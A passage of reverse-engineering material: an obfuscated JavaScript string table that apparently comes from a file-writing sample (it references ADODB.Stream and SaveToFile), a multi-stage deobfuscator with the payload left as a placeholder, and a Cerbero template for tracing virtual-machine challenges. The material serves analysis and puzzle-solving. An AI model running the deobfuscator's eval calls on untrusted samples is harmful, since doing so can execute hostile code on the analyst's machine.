'eVJRT1BMKmVCUV0gSEA7TixoZlNIeUQ3TG1TcHpFS2tvIEYuOWcgOUhTJCwuSENZRUEkZzo2S2ZwW0RDOCQxUFNhIGxGSFVjQSx0NzhYLHNDZGhlQDczXVc7bHhZSSx6MXhvIA==', 'XTFLIWRkYlBEWTFSO1MwIFttRTxjIHlJTFddUD9XV1d5SWZZSUAkSWkwQC5UQDtIWCVjJFBJITpGJEpAcUtOeE83eW5nJDhTW2ZoLktPYyMlSi5JOW1AXms3JFNTYSRAakR1Vw==', 'SHdtd3Q=', 'U0FNWk0=', 'UG54dk8=', 'Z2VoT0g=', 'SkZQSlA=', 'JSAxencjJCBLJF1wYTFdaCBmLFpocWEkOVJpRWp6QksldF5UVUcxRkN6dGxYQzFZcGhXQFJ4PGNPdDBVTHI7TjolVGE4JXRRIEdpW1FsYjFpJEQ/T2hXY3JlQmpLZUVHVGo2UA==', 
'WUVYTEplYiBOS0RqN2RTZ0NecEVXZnVXLk0jISA3RjJGYXkzaU9bVSVlYTlbWHMgc2ZeWlpJZyM/bmNCRHhqO0JQIWY5c3FAI295ZU5wLk5SLExaICxFIyUud2lNajtLa1dtLg==', 'Yzg6ITAhMUZ3RToyPEhrcSF6aSA8IUl4W0ZqRkxEVzAjRTFhYlFuZ0pCZU10bjwkdCxrKmlUPE1nTGc7SSwkXS5nciN1SyNsICNxP1MkWnAgYm1tcnEgPCVyPEZXbTlAdE9FMg==', 'eS4xc21GUDolRCwgLDJyeUU8RDxRTyQxLnVYIyo2bmtmcV1vdDw8WHlALklyLGEzUkhlXiBRaiBlTC5XeUlEYm1HVEZuI2xCZDNYIGZjYnBaSHpAcWJ6IDIgQWh4dGdjVXRScw==', 'YVBXemg=', 'eXN6dGk=', 'TVRNWXM=', 'aE5xa2U=', 'alBaeG4=', 'V2x6eVk=', 'bkxKYVA=', 'QWlxcFM=', 'Z1NSalE=', 'Q0JxcVE=', 'Umxtb0M=', 'Y1RXSlI=', 'Q3Z0QWU=', 'RGFCcXM=', 'T3pQRUU=', 'cnlKS3Y=', 'ZHFLekg=', 'QnNEV2k=', 'Y1VCb1Y=', 'cUVDaU4=', 'THJyb0k=', 'dkVhaGE=', 'bkttcHg=', 'Q1RPZms=', 'am1zdW0=', 'aVVqbFQ=', 'a1pva1U=', 'SHFOY3A=', 'UGxUQlc=', 'VnpXVGQ=', 'b2ViZEM=', 'Q3l2U1c=', 'bU1KREQ=', 'd1V1a2g=', 'RnMgP0AwLjZVM24/QTo7b0x3IUR4ZFcgbF4gM3FVayBGTllkOk9hZmJrZzJvamJDRjxVbDpjSTI2aHNDaUExMFNVJWFbXnhUJUF6ZFohZl0jZVtFZlAgcWVMXThVb2tPS24kQA==', 'UHZvSUU=', 'TGh2bUQ=', 'WFJzRXo=', 'dHNOREw=', 'SU1lRFo=', 'S2t2blI=', 'TlBVZ20=', 'T3F0S0w=', 'YlFFU3E=', 'S2JuWGg=', 'dGl5RGM=', 'RWRieEQ=', 'aG1uTWc=', 'ZFlyTEE=', 'b2ZJeVU=', 'JEpnJDpFIFdmUSBXa0VnWmcjN095VyFrT2gkYWtEIVo4Nk5sUHM6XVRNc1AzY0JQJCxpRT9NQ3pITjJmPEBBRVczS1BXQ0kxOjYqeiBxc3kkWE9JW01Yck4qUmohUlNEamE3VA==', 'T2RUaWM=', 'eEFpU3g=', 'RFFsY3o=', 'bm1oeXI=', 'MnwwfDR8Nnw1fDN8MQ==', 'YmRsb3Q=', 'clVLd1U=', 'VkJ6ZmI=', 'aFRZS1c=', 'WnNqVkw=', 'cWtxT3A=', 'YnZ5SFI=', 'RE5kWEQ=', 'Z1lkeGI=', 'TkJwTnA=', 'IENrUXRhd1tYXXRda3BrIVhVPy54R1IwO3IsQGJwblRhN0sgUzdLZyBiZ1gqUFVOcWZ1bSxbVF51enNtUkhVICB0VW56WVJANkFhQCRXSUhVKnhmc1JIXUQgQFtMa1IyZzh4dQ==', 'ZnlQZHU=', 'QnplbXk=', 'S21sZEQ=', 'aFJxWk4=', 'anJmQ24=', 'TGtjRFA=', 'SWNLeEs=', 'WGNxWVk=', 'WlpLR0M=', 'ekh1dmw=', 'UnRQTGM=', 'MXwwfDV8Mnw2fDd8NHw4fDM=', 'Z2tqckM=', 'a0ZJT0c=', 'aERudlI=', 'Q3BvSnE=', 'dlBtQkY=', 'bXdGaEQ=', 'SWF0Qnk=', 'dUtyc2E=', 'T0VNV0I=', 
'Y0JdOUIqdyRNLEhKYndhMWU4XWg6SktwPHBreHI7JGQ4O1F4aiN5T3IuQGZ0V09IVDtXR25qUDBYIHNrREVAaWF3RGpNcW1nR3NOWGpyI1o4RVlBaXNkMFVydV5xQVohcSBMJQ==', 'SE1XVHM=', 'eFFsU1Y=', 'cHFBWEs=', 'YnpsYlU=', 'd21eR2ElTDc8TktTMGU7UywjbVJPTUxRVHE3RiUgVyM3RU9AYkJiSyVXVz96dXpmZW5XbVs2OkpyV0FHcWs2RiFBQS5vb0Q6QyAkWHlSZTs2R1cqRUw7VCojeWksajN4clk7WQ==', 'WCBZdzxbZ1AgSjZ1Xkc3RHhwcmRSZ1hBZHk4akNBY1NtQ1I/Yl44TzZdQjJ1Sl1MZFs/M2QxcktIY0RNbWNhJUA5MFVsNiVmTkxSJFAlaUxZWUBoUld6MGggIGxOTV5rVCpGOg==', 'TXM3MncgYk88b3hyPEpZWW8zbTpGcWxFIUI/M3pXVWpsQ2N3P0ZyIDl5WW47bCQ/RlVvTUkzJHhSQ2RdeSNyIW82IFlsJHhkOENuSj9XRUZGPzsxNyo6aGlFPC5QQ25Ma1tKdw==', 'V3JpdGU=', 'ZiwzKmtLenEsSTY7WUxRRFFtOkQ3QDJDVDhUUiBTQWUybHU2bkhMXixxbCUkeFI7IGQgQURdWGhYaUBQO3prTG1QcyxFc14qdSN1Sl1aQj9TKkNhWDIuJDFZLlttaSx3IHBmZA==', 'TFR4d1U7dSBAdWsyXjFzLk5aM3doeDgyc1tdJW9EWmx1T1VLQlszTkhNdEYgVTtDIS5YWi5jYlNFW2I/WDg/V08gNlllUDY7cHNkTnVRP1tCRmVbb1MgZFFGeGR0NnFPO3JGOw==', 'SEsyKkNzIEQkamE3Wz8lIEVMZmFRZ2NdM2UudVJHVTpMNixzRiVVYkBmTWlvTl1yMzssJWxDOnQ4MmVeOEdQQmx5dTs3YSxwPGZhQ0hkUF4gSXkxa15POiNKMVhYTGJyTD96aA==', 'OGVHVUEyUXFjRVVxcUtOSmtbWllJIGogYTo7a1VOczh5JGZZUyxqQ2pCVTFBXmUzdEUgMjggRmxRaVlGWE5EekJYZUNXZ21PSVNsd1J0TUEjQDNHSW9AP0gga1J1KkJpOkZaUw==', 'TzY4SEFjIE48cVVrKngzSE8uaCp3SmRAYmF1QCBeazlEJVE7SEJucC5eeUk4RUIkd3V5czNCYiVxbTZxdVhKdzJaWVBkKlIjRGVAdG48TmJ4T1pXVHRPTF4gUCxOIFNLVWpXZA==', 'LiNDS2xLVCxrQ3ohZVVzPENCUWkqaUQ4ZWlyS0duaXdiVG8hN05kPHNhaXVud2tZO0kyZHVIendmZXJbJTB6OmojUHdqY2E3QCBeN0hQR2tPMl0qbHR4TCUsNjdaVCBxdExdWQ==', 'W1J1P15hUUxmZEdHUiEgMmxpcHojLklrWkBAZEgkV1owIyRMRm0gVHJjVE96LHd1O0FqOV5acEt3O3E3Ung6SHBvSSxjLjt0ZzxdTmQlO1heRSA7LnU5YlolV044SGNrW3JAUA==', 'Q2xbJWlXVVojYztoXWFmXjJoaHUxQHRoN3BzRHgwWT9eUl46T1VeZm5JQF1xQE5sTyBLNllqJENnP0dLMmhDbGZGQ05YTXRSWXdncTggLldHQzt3PypxcG1yVFE7cXhSPC5mSA==', 'UG9zaXRpb24=', 'T3Blbg==', 'VHlwZQ==', 'U2F2ZVRvRmlsZQ==', 'Q2xvc2U=', 'cmFuZG9t', 'dG9TdHJpbmc=', 'c3Vic3Ry', 'TkpIcUY=', 'SVZTYkk=', 
'Ykg3SkcgOCRCMzskbG4gbW8gVyE5T0Brd15aLERwcT9EZ2V6TENzXSFXYVFeSmVzSSAqVXBPN25SRVUlMUJ5ODhYWVtuTTg7bzo6eU0ybXpVTzBZQ0MlanlvZHAkeHJyPDlxRg==', 'ZGV1b3E=', 'bSMgYk48MT8hYjBMdTs2Ym08ZGtqcTA6VypEXW9NbWogZzs3LEJAUFp3XjpvY29dSF5qbVNNckQgY28jNyNrU0xPeCF5W1trMFhCM00wa09NWHFnZTdeU2pxejplR2tkJDJASA==', 'S2NMeXE=', 'QURPREIuU3RyZWFt', 'N3w5fDIxfDE1fDF8NHwzfDE4fDEzfDV8MjB8OHwxMnwwfDZ8MnwxMHwxMXwxN3wxOXwxNnwxNA==', 'aTcyaG93Mk42THNOTkRUMG5uVyN4Z3olcXFueHhudEVmaTEyISBRICBbKkZBQjcgLndLVSA8IUVJa3chRFFAOGUkP0B3YSRMWl0gblRAT2RAeFRhIGlBcyxGVE4xOkF0dUkgIA==', 'TjBTQEJMMDIzeXk7eD9eJFtVTmQubkptanJheDc2eHhPelQuLEkxbjEzc0xXIXQgRmRnTCB3IEhTbW9XaTFvICpvTTBAMW07akBZNipUXWEzWF06bD9mSCUuIFI8WGxSIVtBWw==', 'MmoqIFRqOm9Ma3M5VHElWCw/OlVCIXQldEZiclFRaWpzVWMzN0dFMFcldTpKZWUzajZmMW0hSlsjZ3M5ZDYsbnJ0WiFQWFd5KlBGZVk7XVp4UTY8UTBmY2JmaiFSRCFDW1hHcQ==', 'QEZJWFBocEYzaTBYeTsueEdEcnQ5a2xubk5aRyxZW1pbMVVOSnhScjJIWCQxbUIuYXc3el5CIVNoKlsgRy5oVTxPaWZCQWNBLkIgKl5vcUZ4UU82I2QleWFiMzNZcnIqMTNURQ==', 'MTB8MHw5fDN8MnwxMnwxNHw3fDF8MTF8Nnw4fDEzfDR8NQ==', 'elNEWkk=', 'I3AzcmMgXSA6dyBVOnFoUkxpSiRjTVQ3MktEZnpNTkNqOzFVT0NCbnlyUSNAVExmY2dXNyVrQzMjc1FqUmVbdztUVXNmODBCeDlFQCw3OExhcHhiPyF5Mm1vR2RKMERhR1oqJA==', 'Z2EuMVUkQzcwYUFHc3NrOGxHMFd6aCoga3VIa00qSTM5U0olUUVvP0o7QjtZT2U7d11jSTF4czBselslalo5YlBleVc8ZFQ6QGxbT0MscDteKkRaZ3NGbldLMUpNKkt5YUJrUw==', 'WmdESmw='];

(function(c, d)

{

var e = function(f)

{

while (--f)

{

c['push'](c['shift']());

}

};

e(++d);

}(a, 0x9d));

var b = function(c, d)

{

c = c - 0x0;

var e = a[c];

if (b['VJpRej'] === undefined)

{

(function()

{

var f = function()

{

var g;

try

{

g = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');')();

}

catch (h)

{

g = window;

}

return g;

};

var i = f();

var j = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

i['atob'] || (i['atob'] = function(k)

{

var l = String(k)['replace'](/=+$/, '');

for (var m = 0x0, n, o, p = 0x0, q = ''; o = l['charAt'](p++);~o && (n = m % 0x4 ? n * 0x40 + o : o, m++ % 0x4) ? q += String['fromCharCode'](0xff & n >> (-0x2 * m & 0x6)) : 0x0)

{

o = j['indexOf'](o);

}

return q;

});

}());

b['gOEGrn'] = function(r)

{

var s = atob(r);

var t = [];

for (var u = 0x0, v = s['length']; u < v; u++)

{

t += '%' + ('00' + s['charCodeAt'](u)['toString'](0x10))['slice'](-0x2);

}

return decodeURIComponent(t);

};

b['SMcIni'] = {};

b['VJpRej'] = !! [];

}

var w = b['SMcIni'][c];

if (w === undefined)

{

e = b['gOEGrn'](e);

b['SMcIni'][c] = e;

}

else

{

e = w;

}

return e;

};

var script = "BASE64_JAVASCRIPT_PAYLOAD";

script = atob(script);

var clean = "";

var i = 0, last = 0;

while ((i = script.indexOf("b('", i)) != -1)

{

clean += script.substring(last, i);

e = script.indexOf("')", i)

deobf = b(script.substring(i + 3, e));

clean += "'" + deobf.replace(/'/g, "\\'") + "'";

// next

i = e + 2;

last = i

}

clean += script.substring(last, script.length);

// remove b function

i = clean.indexOf("var dy = function()")

clean = clean.substring(i, clean.length);

script = clean;

// second stage: remove initial dictionaries

do

{

found = false;

clean = "";

i = 0;

last = 0;

while ((i = script.indexOf("var", i)) != -1)

{

if (script[i + 9] != '{' || script[i + 10] == '}')

{

i++;

continue;

}

found = true;

clean += script.substring(last, i);

varname = script.substring(i + 4, i + 6);

e = script.indexOf("};", i + 9);

arstr = script.substring(i + 9, e + 2);

print(arstr);

eval("ar = " + arstr);

j = e + 2;

last = j;

while ((j = script.indexOf(varname + "['", j)) != -1)

{

clean += script.substring(last, j);

je = script.indexOf("']", j)

idx = script.substring(j + 4, je)

print(idx);

deobf = ar[idx];

if (typeof(deobf) == "string")

clean += "'" + deobf.replace(/'/g, "\\'") + "'";

else // it's a method

clean += "(" + deobf.toString() + ")";

j = je + 2;

last = j;

}

clean += script.substring(last, script.length);

// next

script = clean;

break;

}

} while (found);

// third stage: remove fake functions

script = script.replace(/[!][!]\s*[\[][\]]/g, "true")

script = script.replace(/[!]\s*[\[][\]]/g, "false")

var prol = "[(]function [(]";

var arg = "[a-zA-Z0-9]{2}";

var sep = "[,] "

var ret = "[)] [{]\\n\\s*return ";

var epil = "[;]\\n\\s+[}][)][(]";

var cap = "([a-zA-Z0-9\\[\\]!']+)";

var fin = "[)]";

for (var i = 0; i < 5; i++)

{

script = script.replace(new RegExp(prol + arg + sep + arg + ret + arg + " [+] " + arg + epil + cap + sep + cap + fin, "g"), "$1 + $2");

script = script.replace(new RegExp(prol + arg + sep + arg + ret + arg + " === " + arg + epil + cap + sep + cap + fin, "g"), "$1 === $2");

script = script.replace(new RegExp(prol + arg + sep + arg + ret + arg + " !== " + arg + epil + cap + sep + cap + fin, "g"), "$1 !== $2");

script = script.replace(new RegExp(prol + arg + sep + arg + sep + arg + ret + arg + "[(]" + arg + sep + arg + "[)]" + epil + cap + sep + cap + sep + cap + fin, "g"), "$1($2, $3)");

script = script.replace(new RegExp(prol + arg + sep + arg + ret + arg + "[(]" + arg + "[)]" + epil + cap + sep + cap + fin, "g"), "$1($2)");

script = script.replace(new RegExp(prol + arg + ret + arg + "[(]" + "[)]" + epil + cap + fin, "g"), "$1()");

}

// fourth stage: remove switch statements

// do twice to get rid of nested switches

for (xx = 0; xx < 2; xx++)

{

clean = "";

i = 0;

last = 0;

while ((i = script.indexOf("['split']('|')", i)) != -1)

{

e = script.lastIndexOf("var ", i);

var ls = e - 1;

while (ls > 0)

{

if (script[ls] != " ")

break;

--ls;

}

indent = script.substring(ls + 1, e);

swe = script.indexOf("\n" + indent + " }", e)

clean += script.substring(last, e);

arstr = script.substring(e + 9, i);

eval("ar = " + arstr + ";");

ar = ar.split("|");

for (var j = 0; j < ar.length; j++)

{

idx = "\n" + indent + " case '" + ar[j] + "':";

k = script.indexOf(idx, i);

ke = script.indexOf("\n" + indent + " case '", k + idx.length)

if (ke == -1 || ke > swe)

ke = swe;

v = script.substring(k + idx.length, ke + 1).trim();

if (v.substring(v.length - 9, v.length) === "continue;")

v = v.substring(0, v.length - 9).trim();

//print(v);

if (j != 0)

clean += indent;

clean += v + "\n";

}

// next

i = script.indexOf("\n" + indent + " break;", ke);

i = script.indexOf("}", i);

last = i + 1

}

clean += script.substring(last, script.length);

script = clean;

}

// fifth stage: remove some string variables

clean = "";

// first collect the variables and remove them from the script

i = 0;

last = 0;

vars = [];

while ((i = script.indexOf("\nvar ", i)) != -1)

{

if (script[i + 10] != "'")

{

i += 1;

continue;

}

clean += script.substring(last, i);

varname = script.substring(i + 5, i + 7);

e = script.indexOf("';", i + 11);

v = script.substring(i + 10, e + 1);

vars.push([varname, v]);

// next

i = e + 2;

last = i;

}

clean += script.substring(last, script.length);

script = clean;

// replace them

for (var k = 0; k < vars.length; k++)

{

varname = vars[k][0];

value = vars[k][1];

script = script.replace(new RegExp('\\b' + varname + '\\b', "g"), value);

}

script
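The fourth stage is probably the least obvious one, so here is a small Python sketch of the same idea. The obfuscator stores the real statement order in a string such as '2|0|1', splits it on '|', and walks the cases of a switch in that order. Undoing it means emitting the case bodies in that order and dropping the trailing continue. The function name unflatten and the case bodies are invented for the example; the JavaScript above works on the raw script text instead of a dictionary.

```python
def unflatten(order, cases):
    """Return the case bodies in execution order, without the trailing 'continue;'."""
    out = []
    for label in order.split("|"):
        body = cases[label].strip()
        if body.endswith("continue;"):
            body = body[:-len("continue;")].strip()
        out.append(body)
    return out

# Made-up switch cases, keyed by their case label.
cases = {
    "0": "b = a + 1;\ncontinue;",
    "1": "c = b * 2;\ncontinue;",
    "2": "a = 5;\ncontinue;",
}

linear = unflatten("2|0|1", cases)
print("\n".join(linear))
```

Nested switches need more than one pass, which is why the JavaScript version runs its loop twice.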



How to solve VM-based challenges with the help of Cerbero.

This is the template code:

from Pro.Core import *
from Pro.UI import *
from Pro.ccast import sbyte
import os, struct

REG_COUNT = 16

def regName(id):
    return "R" + str(id)

def disassemble(code, regs):
    return "instr"

STEP_VIEW_ID = 1
DISASM_VIEW_ID = 2
MEMORY_VIEW_ID = 3
REGISTERS_VIEW_ID = 4
STACK_VIEW_ID = 5

# the dump directory should have files with increasing number as name
# e.g.: 0, 1, 2, etc.
DBGDIR = r"path/to/state/dumps"

BPX = -1

# logic to extract the instruction pointer from the dumps
# we use that as text in the Trace table and to go to a break point
def loadStepDescr(ud, steps):
    stepsdescr = []
    bpx_pos = -1
    for step in steps:
        with open(os.path.join(DBGDIR, str(step)), "rb") as f:
            f.seek((REG_COUNT - 1) * 2)
            ip = struct.unpack_from(">H", f.read(2), 0)[0]
            if bpx_pos == -1 and ip == BPX:
                bpx_pos = len(stepsdescr)
            stepsdescr.append("%04X" % (ip,))
    ud["stepsdescr"] = stepsdescr
    if bpx_pos != -1:
        ud["bpxpos"] = bpx_pos

def loadStep(cv, step, ud):
    #with open(os.path.join(DBGDIR, str(step)), "rb") as f:
    #    dump = f.read()
    dump = b"\x00\x01" * REG_COUNT
    regs = struct.unpack_from("<" + ("H" * REG_COUNT), dump, 0)
    ud["regs"] = regs
    # set up regs table
    t = cv.getView(REGISTERS_VIEW_ID)
    labels = NTStringList()
    labels.append("Register")
    labels.append("Value")
    t.setColumnCount(2)
    t.setRowCount(REG_COUNT)
    t.setColumnLabels(labels)
    t.setColumnCWidth(0, 10)
    t.setColumnCWidth(1, 20)
    # set up memory
    h = cv.getView(MEMORY_VIEW_ID)
    curoffs = h.getCurrentOffset()
    cursoroffs = h.getCursorOffset()
    #mem = dump[REG_COUNT * 2:]
    mem = b"dummy memory"
    ud["mem"] = mem
    h.setBytes(mem)
    h.setCursorOffset(cursoroffs)
    h.setCurrentOffset(curoffs)
    # set up stack table
    stack = (0x1000, 0x2000, 0x3000)
    ud["cursp"] = 0x6000
    ud["stack"] = stack
    t = cv.getView(STACK_VIEW_ID)
    labels = NTStringList()
    labels.append("Stack address")
    labels.append("Value")
    t.setColumnCount(2)
    t.setRowCount(len(stack))
    t.setColumnLabels(labels)
    t.setColumnCWidth(0, 10)
    t.setColumnCWidth(1, 20)
    # set up disasm
    t = cv.getView(DISASM_VIEW_ID)
    disasm = disassemble(mem, regs)
    t.setText(disasm)

def tracerCallback(cv, ud, code, view, data):
    if code == pvnInit:
        # get steps (the directory is the DBGDIR constant defined above)
        steps = os.listdir(DBGDIR)
        steps = [int(e) for e in steps]
        steps = sorted(steps)
        ud["steps"] = steps
        loadStepDescr(ud, steps)
        # set up steps
        t = cv.getView(STEP_VIEW_ID)
        labels = NTStringList()
        labels.append("Trace")
        t.setColumnCount(1)
        t.setRowCount(len(steps))
        t.setColumnLabels(labels)
        t.setColumnCWidth(0, 10)
        # go to bpx if any
        if "bpxpos" in ud:
            bpxpos = ud["bpxpos"]
            t.setSelectedRow(bpxpos)
        return 1
    elif code == pvnGetTableRow:
        vid = view.id()
        if vid == STEP_VIEW_ID:
            data.setText(0, str(ud["stepsdescr"][data.row]))
        elif vid == REGISTERS_VIEW_ID:
            data.setText(0, regName(data.row))
            v = ud["regs"][data.row]
            data.setText(1, "%d (0x%X)" % (v, v))
            if data.row >= 13:
                data.setBgColor(0, ProColor_Special)
                data.setBgColor(1, ProColor_Special)
        elif vid == STACK_VIEW_ID:
            spaddr = ud["cursp"] + (data.row * 2)
            data.setText(0, "0x%04X" % (spaddr,))
            v = ud["stack"][data.row]
            data.setText(1, "%d (0x%X)" % (v, v))
    elif code == pvnRowSelected:
        vid = view.id()
        if vid == STEP_VIEW_ID:
            loadStep(cv, ud["steps"][data.row], ud)
    return 0

def tracerDlg():
    ctx = proContext()
    v = ctx.createView(ProView.Type_Custom, "Tracer Demo")
    user_data = {}
    v.setup("<ui><hs><table id='1'/><vs><text id='2'/><hex id='3'/></vs><table id='4'/><table id='5'/></hs></ui>", tracerCallback, user_data)
    dlg = ctx.createDialog(v)
    dlg.show()

tracerDlg()
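The template expects one state dump per step, named 0, 1, 2 and so on, with the registers at the start of each file and memory after them (see the commented-out lines in loadStep). The standalone sketch below shows one way such files could be produced and read back outside of Cerbero. The helper names pack_dump, parse_dump and write_trace are hypothetical, and so is the sample data. Byte order is left as a parameter because the template reads the instruction pointer with ">H" but the full register set with "<", so pick whichever matches the VM being traced.

```python
import os
import struct
import tempfile

REG_COUNT = 16  # same value as in the template

def pack_dump(regs, mem, byteorder="<"):
    """Serialize one VM state: REG_COUNT 16-bit registers, then raw memory."""
    if len(regs) != REG_COUNT:
        raise ValueError("expected %d registers" % REG_COUNT)
    return struct.pack(byteorder + "H" * REG_COUNT, *regs) + mem

def parse_dump(dump, byteorder="<"):
    """Split a dump back into (registers, memory)."""
    regs = struct.unpack_from(byteorder + "H" * REG_COUNT, dump, 0)
    return regs, dump[REG_COUNT * 2:]

def write_trace(directory, states):
    """Write each (regs, mem) state to a file named after its step number."""
    for step, (regs, mem) in enumerate(states):
        with open(os.path.join(directory, str(step)), "wb") as f:
            f.write(pack_dump(regs, mem))

# Hypothetical two-step trace; the last register stands in for the
# instruction pointer, as in loadStepDescr.
states = [
    ([0] * 15 + [0x0100], b"\x90\x90"),
    ([1] * 15 + [0x0102], b"\x90\x90"),
]

with tempfile.TemporaryDirectory() as dbgdir:
    write_trace(dbgdir, states)
    # Sort numerically so that step 10 comes after step 9.
    for name in sorted(os.listdir(dbgdir), key=int):
        with open(os.path.join(dbgdir, name), "rb") as f:
            regs, mem = parse_dump(f.read())
        print(name, "%04X" % regs[REG_COUNT - 1], mem)
```

Pointing DBGDIR at a directory filled this way, and re-enabling the commented-out file reads in loadStep, should be enough to browse a real trace.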